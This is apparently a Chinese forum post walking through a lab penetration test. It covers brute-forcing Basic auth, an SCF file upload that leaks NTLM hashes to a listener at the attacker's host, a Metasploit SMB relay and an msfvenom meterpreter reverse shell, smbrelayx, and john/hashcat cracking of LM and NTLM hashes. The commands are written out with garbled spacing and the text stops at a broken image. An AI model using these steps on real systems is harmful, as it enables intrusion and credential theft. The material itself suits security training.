胆囊息肉

注册

 

发新话题 回复该主题

网络安全之渗透实战学习 [复制链接]

1#

前言

本次渗透以SMB共享之SCF文件攻击为突破点,利用burp编码爆破BasicAuthorization认证、smb连接的多种方法、windows用户的NTLM值破解方法、evil-winrm的运用、windows主机信息收集工具、msf运行powershell脚本、远程运行powershell脚本、PrintNightmare漏洞提权等多个知识点。

本次渗透过程从技术层面来说难度并不算很大,本文精华在于渗透过程中运用到了多个知识点,并对多种利用SMB攻击的方法作了总结,下面开始此次渗透实战之旅。

信息收集

首先进行基本的端口扫描;

看到端口,想到了smb的多种利用方法;看到,想到了可能要利用evil-winrm;然后在重点照顾下端口;

nmap-A--scriptsmb-vuln*-p10.10.11.

并没有发现直接的突破口,那我们还是从web入手。

smb匿名登录

尝试一波smb匿名登录,看是否存在共享文件,可以作为突破的线索;

常用命令总结如下:

smbmap-H10.10.11.smbclient-N-L//10.10.11.enum4linux-a10.10.11.

暂时没有发现。

为了感谢广大读者伙伴的支持,准备了以下福利给到大家:1、多本网络安全系列电子书(该有的都有了)2、全套工具包(最全中文版,想用哪个用哪个)3、份src源码技术文档(项目学习不停,实践得真知)4、网络安全基础入门、Linux、web安全、攻防方面的视频(最新版)5、网络安全学习路线(告别不入流的学习)6、ctf夺旗赛解析(题目解析实战操作)

burp编码爆破

打开网页,弹出BasicAuthorization认证

抓包进行爆破;

划红线的地方要设置3次,分别为:1、admin2、:3、密码

用个弱口令字典,跑出结果了;

admin:admin

SMB共享之SCF文件攻击

登录后台,发现一个可上传文件的地方;

经过多次尝试,这里可利用SCF文件攻击进行渗透,下面介绍3种利用方法:

通过NTLM捕获进行SMB攻击

基本原理:SCF(Shell命令文件)文件可用于执行一组有限的操作,一个SCF文件可以用来访问一个特定的UNC路径,允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件,然后需要被植入到网络共享。

[Shell]Command=2IconFile=\\10.10.16.4\share\hack.ico[Taskbar]Command=ToggleDesktop

将hack.txt文件保存为SCF文件,在文件名前面添加

符号可以将hack.scf放在共享驱动器文件列表的顶部。(

hack.scf)并设置接收方法;

Responder需要使用以下参数执行来捕获浏览共享的用户的哈希值。

responder-wrf-Itun0

当用户浏览共享时,将自动会从系统建立网络连接,连接到包含在SCF文件内的UNC路径。Windows将尝试使用用户名和密码对该共享进行身份验证。在验证过程中,随机的8字节质询密钥会从服务器发送到客户端,散列后的NTLM/LANMAN密码再次使用这个质询密钥进行加密。Responder将捕获NTLMv2哈希。

除了Responder,MSF也有一个模块,可以用来捕获来自SMB客户端的挑战–响应密码哈希。

auxiliary/server/capture/smb

上传之前的hack.scf来触发,就获取到了用户的NTLM值。

直接获取shell

利用MSF框架实现攻击。

exploit/windows/smb/smb_relaysetpayloadwindows/meterpreter/reverse_tcpsetLHOST10.10.16.4setsmbhost..0.setsrvportexploit

上传之前的hack.scf来触发,但本次渗透中该方法实测失败了。

上传payload获取shell

本方法的主要优点是它不需要与用户有任何交互,并自动强制用户连接到共享,在这个过程中不存在NTLMv2哈希的协商过程。因此,也可以将此技术与SMB中继相结合,SMB中继将提供有效载荷,可以从访问该共享的每个用户检索MeterpreterShell。

MSFVenom可用于生成将在目标上执行的有效载荷:

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=..1.LPORT=-fexehack.exe

利用Impacket中的smbrelayx这个python脚本可以设置中继攻击并在当目标主机尝试连接SMB服务器时提供有效载荷。这将自动执行,因为SCF文件将强制每个用户使用他们自己的凭据连接到一个不存在的共享。

./smbrelayx.py-hTarget-IP-e./hack.exe

同时利用MSF设置木马的回连端:

exploit/multi/handler

模块需要配置与生成的有效载荷相同的参数。

setpayloadwindows/meterpreter/reverse_tcpsetLHOST..1.setLPORTexploit

当用户浏览共享时,SMB服务器将接收到连接,并且将使用用户名和密码散列来与他的系统进行认证,并将有效载荷执行为可写共享。本次渗透中该方法实测失败。

获取到NTLM值后,下一步尝试破解。

LMNTLMNET-NTLM2破解

Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LMHash,第二部分是NTHashLM

WindowsVista/Server8已经默认关闭,在老版本可以遇到,但根据windwos的向下兼容性,可以通过组策略启用它示例:BDCFD6hash破解:

john--format=lmhash.txthashcat-m-a3hash.txt

NThash

NTLM是现在Windows系统上存储密码的方式,可以通过转储SAM数据库或使用Mimikatz来获得。示例:B4B9B02E6F09A9BDFBE2Bhash破解:

john--format=nthash.txthashcat-m0-a3hash.txt

NTLMV1NTLM协议在服务器和客户端之间的质询/响应中使用NTHash,协议的v1同时使用NT和LM哈希,具体取决于配置和可用内容。示例:

u4-netntlm::kNS08f8e26de9300000b8c23acddb6ceae1e4bfba41:cbecc

hash破解:

john--format=netntlmhash.txthashcat-m-a3hash.txt

NTLMV2这是NTLM协议的新版本和改进版本,这使其很难破解。该概念与NTLMv1相同,只是发送到服务器的算法和响应不同,从Windows0开始,在Windows中为默认值。示例:

admin::N46iSNekpT:08ca45b7d7ea58ee8dcbe4446966aadac6:5cc78300b45cd07d7b95acd12ffae052920b85f78dc31cdb3b92f5dc

hash破解:

john--format=netntlmv2hash.txthashcat-m-a3hash.txt

在本次渗透中用的是NTLMV2;

hashcat-m-a.txt--wordlisttop.txt

john--format=netntlmv.txt-w=top.txt

成功得到用户名和密码:tonyltony

根据开放的和端口,连接一波;

尝试psexec连接失败;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pB7Ofv13-5)(

分享 转发
TOP
发新话题 回复该主题